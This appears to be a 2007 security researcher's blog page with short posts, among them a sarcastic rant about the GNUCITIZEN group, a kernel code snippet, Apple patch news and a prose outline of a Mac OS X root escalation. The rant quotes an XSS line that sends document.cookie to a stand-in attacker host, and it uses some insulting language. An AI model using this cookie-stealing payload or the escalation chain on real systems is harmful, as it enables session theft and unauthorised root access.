Thursday, September 27, 2007

That annoying GNUCITIZEN

It seems that there's a craze about applications being Javascript-enabled. It's a seriously insecure blackhole, dood! Between Bangbus spam on full-disclosure, Youtube pedophiles and other friendly inhabitants of the security community, we find Petko D. Petkov, also known as pdp, also known as GNUCITIZEN, web slayer and über underground hacker, known for the disclosure of repetitive web-related security advisories. Yack yack, the roof is on fire!

Not long ago, he came up with a pretty good timing for his new, re-designed and all-round 'bad boy looking' website, reborn as a (quoting literally):

GNUCITIZEN is a creative hacker organization. (...) So who is part of the group? The GNUCITIZEN group has some quite unique talents on board. We constantly expand our core team through a well though screening process.
We thought for first time that they were some sort of shady organization, right after reading the paragraph on screening. It was like, water-boarding training! How much water can you pull out of your lungs? Approved. Obviously this malign view went away after staring at the pictures for just a moment.

So, what's up with the GNUCITIZEN?
  1. It gets annoying to read his apocalyptic Engrish. There's no single text from this young man that doesn't make you think something is seriously ticking inside someone else's head. It might be drugs, it might be some serious attention seeking disorder, or it might be BLACK PUBLIC RELATIONS (panic ensues at this point, take your shotgun).
  2. The overly repetitive pattern of the work: while they pretend to be an active group with a handful different work areas, there's nothing but web security crap there. Not even the kind of issues that get your Wordpress blog credentials popped out. No, it's just a few different synonyms of Cross Site Scripting. Also known as the 'alert window denial of service' vulnerability class:
    1. alert('Oh gnoes, cookie:' + document.cookie);
    2. document.location('http://oh.gnoes.ru/cookie.php?' + document.cookie);
    3. Don't forget local network port scanning, DANGER WILL ROBINSON!
  3. The presence of a Public Relations consultant (whatever that means), who happens to be Petkov's polski speaking chick!:
Ivana Kalay is a leading Public Relations security (PRS) expert. She specializes in competitive intelligence, social engineering and Black PR. Ivana is also an active member of GNUCITIZEN group and founder of Spin Hunters, the first PRS company in United Kingdom.
Note that our friendly UK lobbyists have a law that basically makes all-things-hacking a bad thing! Maybe they will report themselves to Scotland Yard after reading this, and make us all a favor.

But please, stop the craze of non-sense security. Web security is important. Making a name for yourself just for fame and buzz, is something nobody cares about. The so-called partial disclosure is just part of this madness. Security is simple: you either talk about it, or shut the f*ck up and keep it for yourself. Bragging is really retarded.

at 13:44 0 comments

Labels: , ,

Wednesday, July 11, 2007

Nice granny code!

Too bad it only works for 'union' :>


2016
2017 /*
2018  * Delete a whiteout from the filesystem.
2019  */
2020 /* ARGSUSED */
2021 #warning XXX authorization not implmented for whiteouts
2022 int
2023 undelete(struct proc *p, register struct undelete_args *uap, __unused register_t *retval)
2024 {

Left-overs from old functionality are dangerous. Or at least fun to deal with.

at 10:38 0 comments

Labels: , ,

Tuesday, February 06, 2007

Mom, teh internets are down


Celebrating the 'Safe Internet Day' ?

at 10:20 0 comments

Labels: ,

Friday, January 26, 2007

Apple releases Quicktime and Airport Extreme security updates

Apple has released security updates for the vulnerability published during the Month of Apple Bugs as MOAB-01-01-2007 and the closing vulnerability for the Month of Kernel Bugs , MOKB-30-11-2006. The exposure time was of 22 days for the first, and 58 days for the latter (although no public proof of concept was distributed, which would have, most probably, boosted the patch development).

at 08:04 0 comments

Labels: , , , , , ,

Tuesday, January 23, 2007

Exploiting the otherwise non-exploitable, on Mac OS X

UserNotificationCenter retains wheel privileges on execution time, and still has a UID associated with the current user. Because of this, it will attempt to run any InputManager provided by the user. Code within the input manager will run under wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges.

See the Month of Apple Bugs release and the exploit. This issue can be abused by fully unprivileged users and triggered via any of the so-called 'crashes' (ex. alleged 'denial of service'-only issues...).

A tribute to the Month of Browser Bugs, and specially Matt Miller, HD Moore and Skywing.

at 07:43 0 comments

Labels: , , ,

Sunday, January 07, 2007

Inline Media Encryptor

Description from the NSA website about IME:

The Inline Media Encryptor (IME) is a government-developed media encryption device. It is positioned "in line" between the computer processor and hard drive to ensure that anything stored to the hard drive gets encrypted and anything retrieved from the hard drive gets decrypted. The IME protects data classified Top Secret and below. Data stored on the hard drive is considered unclassified when encrypted.

Nice. Read about the features. Certainly hardware based solutions are extremely useful. Wonder if there's a commercial device that conforms to similar standards available for public consumption. Hopefully not.

at 05:19 0 comments

Labels: ,

Friday, January 05, 2007

January first week digest

There has been a significant work load, between working on exploit code and dealing with press and media. Looks like some stuff has been going around:

More to come if there's time for it.

at 05:23 0 comments

Labels: , ,

Subscribe to: Posts (Atom)